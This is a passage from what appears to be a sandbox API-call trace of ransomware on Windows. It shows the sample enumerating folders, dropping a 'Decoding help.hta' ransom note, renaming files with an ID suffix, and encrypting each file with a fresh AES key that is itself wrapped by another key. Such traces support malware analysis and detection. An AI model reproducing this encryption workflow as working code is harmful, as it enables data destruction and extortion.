CloseHandle (hObject=0x230) returned 1 [0040.160] FindNextFileW (in: hFindFile=0x5a56f0, lpFindFileData=0xb40fd30 | out: lpFindFileData=0xb40fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7d580500, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x7d5f2920, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x7d5f2920, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="HelpCfg", cAlternateFileName="")) returned 1 [0040.160] lstrcmpW (lpString1=".", lpString2="HelpCfg") returned -1 [0040.160] lstrcmpW (lpString1="..", lpString2="HelpCfg") returned -1 [0040.160] lstrcmpiW (lpString1="windows", lpString2="HelpCfg") returned 1 [0040.162] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\*.*" [0040.162] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\*.*") returned 49 [0040.162] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\", lpString2="HelpCfg" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg" [0040.162] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\*.*" [0040.162] GlobalMemoryStatus (in: lpBuffer=0xb40fd10 | out: lpBuffer=0xb40fd10) [0040.163] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x10bc64c0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x230 [0040.163] CloseHandle (hObject=0x230) returned 1 [0040.163] FindNextFileW (in: hFindFile=0x5a56f0, lpFindFileData=0xb40fd30 | out: lpFindFileData=0xb40fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7d580500, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x7d5f2920, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x7d5f2920, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="HelpCfg", cAlternateFileName="")) returned 0 [0040.163] FindClose (in: hFindFile=0x5a56f0 | out: hFindFile=0x5a56f0) returned 1 Thread: id = 124 os_tid = 0x894 [0040.164] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Adobe\\ARM\\*.*", lpFindFileData=0xb54fd30 | out: lpFindFileData=0xb54fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe4efbbe0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xe4efbbe0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xe4efbbe0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5a56f0 [0040.165] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0040.165] FindNextFileW (in: hFindFile=0x5a56f0, lpFindFileData=0xb54fd30 | out: lpFindFileData=0xb54fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe4efbbe0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xe4efbbe0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xe4efbbe0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0040.165] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0040.165] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0040.165] FindNextFileW (in: hFindFile=0x5a56f0, lpFindFileData=0xb54fd30 | out: lpFindFileData=0xb54fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe4efbbe0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xf2028d90, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xf2028d90, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Reader_10.0.0", cAlternateFileName="READER~1.0")) returned 1 [0040.165] lstrcmpW (lpString1=".", lpString2="Reader_10.0.0") returned -1 [0040.165] lstrcmpW (lpString1="..", lpString2="Reader_10.0.0") returned -1 [0040.165] lstrcmpiW (lpString1="windows", lpString2="Reader_10.0.0") returned 1 [0040.165] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\ProgramData\\Adobe\\ARM\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Adobe\\ARM\\*.*") returned="\\\\?\\C:\\ProgramData\\Adobe\\ARM\\*.*" [0040.165] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Adobe\\ARM\\*.*") returned 32 [0040.165] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Adobe\\ARM\\", lpString2="Reader_10.0.0" | out: lpString1="\\\\?\\C:\\ProgramData\\Adobe\\ARM\\Reader_10.0.0") returned="\\\\?\\C:\\ProgramData\\Adobe\\ARM\\Reader_10.0.0" [0040.165] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Adobe\\ARM\\Reader_10.0.0", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Adobe\\ARM\\Reader_10.0.0\\*.*") returned="\\\\?\\C:\\ProgramData\\Adobe\\ARM\\Reader_10.0.0\\*.*" [0040.165] GlobalMemoryStatus (in: lpBuffer=0xb54fd10 | out: lpBuffer=0xb54fd10) [0040.165] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x94906c8, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x230 [0040.166] CloseHandle (hObject=0x230) returned 1 [0040.166] FindNextFileW (in: hFindFile=0x5a56f0, lpFindFileData=0xb54fd30 | out: lpFindFileData=0xb54fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe4efbbe0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xf2028d90, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xf2028d90, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Reader_10.0.0", cAlternateFileName="READER~1.0")) returned 0 [0040.166] FindClose (in: hFindFile=0x5a56f0 | out: hFindFile=0x5a56f0) returned 1 Thread: id = 125 os_tid = 0x8a0 [0040.167] FindFirstFileW (in: lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\*.*", lpFindFileData=0xb68fd30 | out: lpFindFileData=0xb68fd30*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xfc138cb0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfc3e6570, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfc3e6570, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5d82d0 [0041.767] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0041.767] FindNextFileW (in: hFindFile=0x5d82d0, lpFindFileData=0xb68fd30 | out: lpFindFileData=0xb68fd30*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xfc138cb0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfc3e6570, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfc3e6570, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0041.768] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0041.768] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0041.768] FindNextFileW (in: hFindFile=0x5d82d0, lpFindFileData=0xb68fd30 | out: lpFindFileData=0xb68fd30*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x3f33d800, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x3f33d800, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xfc138cb0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0xd5600, dwReserved0=0x0, dwReserved1=0x0, cFileName="Office32MUI.msi", cAlternateFileName="OFFICE~1.MSI")) returned 1 [0041.768] lstrcpyW (in: lpString1=0x10ba6450, lpString2="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\*.*" | out: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\*.*") returned="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\*.*" [0041.768] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\*.*") returned 70 [0041.768] lstrcatW (in: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Decoding help.hta") returned="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Decoding help.hta" [0041.768] GetFileAttributesW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Decoding help.hta" (normalized: "c:\\msocache\\all users\\{90140000-0043-0409-1000-0000000ff1ce}-c\\decoding help.hta")) returned 0xffffffff [0041.768] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Decoding help.hta" (normalized: "c:\\msocache\\all users\\{90140000-0043-0409-1000-0000000ff1ce}-c\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x468 [0041.768] WriteFile (in: hFile=0x468, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0xb68fcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0xb68fcf8*=0x78e, lpOverlapped=0x0) returned 1 [0041.769] CloseHandle (hObject=0x468) returned 1 [0041.769] SetFileAttributesW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0041.769] lstrcmpiW (lpString1="Decoding help.hta", lpString2="Office32MUI.msi") returned -1 [0041.769] lstrlenW (lpString="Office32MUI.msi") returned 15 [0041.770] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\*.*" | out: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\*.*") returned="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\*.*" [0041.770] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\*.*") returned 70 [0041.770] lstrcatW (in: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\", lpString2="Office32MUI.msi" | out: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.msi") returned="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.msi" [0041.770] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.msi" | out: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.msi") returned="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.msi" [0041.770] lstrcatW (in: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.msi", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.msi.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.msi.[ID]g9uZrLhJaygpwRm1[ID]" [0041.770] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-0043-0409-1000-0000000ff1ce}-c\\office32mui.msi"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.msi.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\msocache\\all users\\{90140000-0043-0409-1000-0000000ff1ce}-c\\office32mui.msi.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0041.770] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.msi.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\msocache\\all users\\{90140000-0043-0409-1000-0000000ff1ce}-c\\office32mui.msi.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x468 [0041.770] CreateFileMappingA (hFile=0x468, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x46c [0041.770] CryptAcquireContextA (in: phProv=0xb68fcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xb68fcec*=0x3448b60) returned 1 [0044.945] CryptGenKey (in: hProv=0x3448b60, Algid=0x6610, dwFlags=0x1, phKey=0xb68fce8 | out: phKey=0xb68fce8*=0x5d8350) returned 1 [0044.945] CryptExportKey (in: hKey=0x5d8350, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0xb68fbe4, pdwDataLen=0xb68fce4 | out: pbData=0xb68fbe4*, pdwDataLen=0xb68fce4*=0x2c) returned 1 [0044.945] MapViewOfFile (hFileMappingObject=0x46c, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xd5600) returned 0x13840000 [0044.961] CryptEncrypt (in: hKey=0x5a5130, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xb68fbe4*, pdwDataLen=0xb68fcf8*=0x40, dwBufLen=0x100 | out: pbData=0xb68fbe4*, pdwDataLen=0xb68fcf8*=0x100) returned 1 [0044.961] CryptEncrypt (in: hKey=0x5d8350, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x13840000, pdwDataLen=0xb68fce4*=0xd5600, dwBufLen=0xd5600 | out: pbData=0x13840000*, pdwDataLen=0xb68fce4*=0xd5600) returned 1 [0045.632] UnmapViewOfFile (lpBaseAddress=0x13840000) returned 1 [0045.852] CloseHandle (hObject=0x46c) returned 1 [0045.852] CryptDestroyKey (hKey=0x5d8350) returned 1 [0045.852] CryptReleaseContext (hProv=0x3448b60, dwFlags=0x0) returned 1 [0045.852] SetFilePointerEx (in: hFile=0x468, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0045.853] WriteFile (in: hFile=0x468, lpBuffer=0xb68fbe4*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0xb68fcf8, lpOverlapped=0x0 | out: lpBuffer=0xb68fbe4*, lpNumberOfBytesWritten=0xb68fcf8*=0x100, lpOverlapped=0x0) returned 1 [0045.853] WriteFile (in: hFile=0x468, lpBuffer=0x4040f0*, nNumberOfBytesToWrite=0x500, lpNumberOfBytesWritten=0xb68fcf8, lpOverlapped=0x0 | out: lpBuffer=0x4040f0*, lpNumberOfBytesWritten=0xb68fcf8*=0x500, lpOverlapped=0x0) returned 1 [0045.853] CloseHandle (hObject=0x468) returned 1 [0045.864] SetFileAttributesW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.msi.[ID]g9uZrLhJaygpwRm1[ID]", dwFileAttributes=0x1) returned 1 [0045.865] FindNextFileW (in: hFindFile=0x5d82d0, lpFindFileData=0xb68fd30 | out: lpFindFileData=0xb68fd30*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4529b900, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x4529b900, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xfc138cb0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x567, dwReserved0=0x0, dwReserved1=0x0, cFileName="Office32MUI.xml", cAlternateFileName="OFFICE~1.XML")) returned 1 [0048.945] lstrcpyW (in: lpString1=0x5e90c18, lpString2="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\*.*" | out: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\*.*") returned="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\*.*" [0048.945] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\*.*") returned 70 [0048.945] lstrcatW (in: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Decoding help.hta") returned="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Decoding help.hta" [0048.945] GetFileAttributesW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Decoding help.hta" (normalized: "c:\\msocache\\all users\\{90140000-0043-0409-1000-0000000ff1ce}-c\\decoding help.hta")) returned 0x1 [0048.946] lstrcmpiW (lpString1="Decoding help.hta", lpString2="Office32MUI.xml") returned -1 [0048.946] lstrlenW (lpString="Office32MUI.xml") returned 15 [0048.946] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\*.*" | out: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\*.*") returned="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\*.*" [0048.946] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\*.*") returned 70 [0048.946] lstrcatW (in: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\", lpString2="Office32MUI.xml" | out: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml") returned="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml" [0048.946] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml" | out: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml") returned="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml" [0048.946] lstrcatW (in: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml.[ID]g9uZrLhJaygpwRm1[ID]" [0048.946] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0043-0409-1000-0000000ff1ce}-c\\office32mui.xml"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\msocache\\all users\\{90140000-0043-0409-1000-0000000ff1ce}-c\\office32mui.xml.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0051.014] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\msocache\\all users\\{90140000-0043-0409-1000-0000000ff1ce}-c\\office32mui.xml.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x270 [0051.014] CreateFileMappingA (hFile=0x270, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x74c [0051.015] CryptAcquireContextA (in: phProv=0xb68fcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xb68fcec*=0x3449f08) returned 1 [0054.613] CryptGenKey (in: hProv=0x3449f08, Algid=0x6610, dwFlags=0x1, phKey=0xb68fce8 | out: phKey=0xb68fce8*=0x6717f0) returned 1 [0054.613] CryptExportKey (in: hKey=0x6717f0, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0xb68fbe4, pdwDataLen=0xb68fce4 | out: pbData=0xb68fbe4*, pdwDataLen=0xb68fce4*=0x2c) returned 1 [0054.613] MapViewOfFile (hFileMappingObject=0x74c, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x560) returned 0x2d0000 [0054.623] CryptEncrypt (in: hKey=0x5a5130, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xb68fbe4*, pdwDataLen=0xb68fcf8*=0x40, dwBufLen=0x100 | out: pbData=0xb68fbe4*, pdwDataLen=0xb68fcf8*=0x100) returned 1 [0054.623] CryptEncrypt (in: hKey=0x6717f0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2d0000*, pdwDataLen=0xb68fce4*=0x560, dwBufLen=0x560 | out: pbData=0x2d0000*, pdwDataLen=0xb68fce4*=0x560) returned 1 [0054.623] UnmapViewOfFile (lpBaseAddress=0x2d0000) returned 1 [0054.625] CloseHandle (hObject=0x74c) returned 1 [0054.625] CryptDestroyKey (hKey=0x6717f0) returned 1 [0054.625] CryptReleaseContext (hProv=0x3449f08, dwFlags=0x0) returned 1 [0054.625] SetFilePointerEx (in: hFile=0x270, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0054.625] WriteFile (in: hFile=0x270, lpBuffer=0xb68fbe4*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0xb68fcf8, lpOverlapped=0x0 | out: lpBuffer=0xb68fbe4*, lpNumberOfBytesWritten=0xb68fcf8*=0x100, lpOverlapped=0x0) returned 1 [0056.934] WriteFile (in: hFile=0x270, lpBuffer=0x4040f0*, nNumberOfBytesToWrite=0x500, lpNumberOfBytesWritten=0xb68fcf8, lpOverlapped=0x0 | out: lpBuffer=0x4040f0*, lpNumberOfBytesWritten=0xb68fcf8*=0x500, lpOverlapped=0x0) returned 1 [0056.934] CloseHandle (hObject=0x270) returned 1 [0056.934] SetFileAttributesW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml.[ID]g9uZrLhJaygpwRm1[ID]", dwFileAttributes=0x1) returned 1 [0058.454] FindNextFileW (in: hFindFile=0x5d82d0, lpFindFileData=0xb68fd30 | out: lpFindFileData=0xb68fd30*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x3e02ab00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x3e02ab00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xfc301560, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x2cb13b, dwReserved0=0x0, dwReserved1=0x0, cFileName="OWOW32LR.cab", cAlternateFileName="")) returned 1 [0058.455] lstrcpyW (in: lpString1=0x2a820628, lpString2="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\*.*" | out: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\*.*") returned="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\*.*" [0058.455] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\*.*") returned 70 [0058.455] lstrcatW (in: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Decoding help.hta") returned="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Decoding help.hta" [0058.455] GetFileAttributesW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Decoding help.hta" (normalized: "c:\\msocache\\all users\\{90140000-0043-0409-1000-0000000ff1ce}-c\\decoding help.hta")) returned 0x1 [0058.455] lstrcmpiW (lpString1="Decoding help.hta", lpString2="OWOW32LR.cab") returned -1 [0058.455] lstrlenW (lpString="OWOW32LR.cab") returned 12 [0058.455] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\*.*" | out: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\*.*") returned="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\*.*" [0058.455] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\*.*") returned 70 [0058.455] lstrcatW (in: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\", lpString2="OWOW32LR.cab" | out: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\OWOW32LR.cab") returned="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\OWOW32LR.cab" [0058.455] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\MSOCache\\All 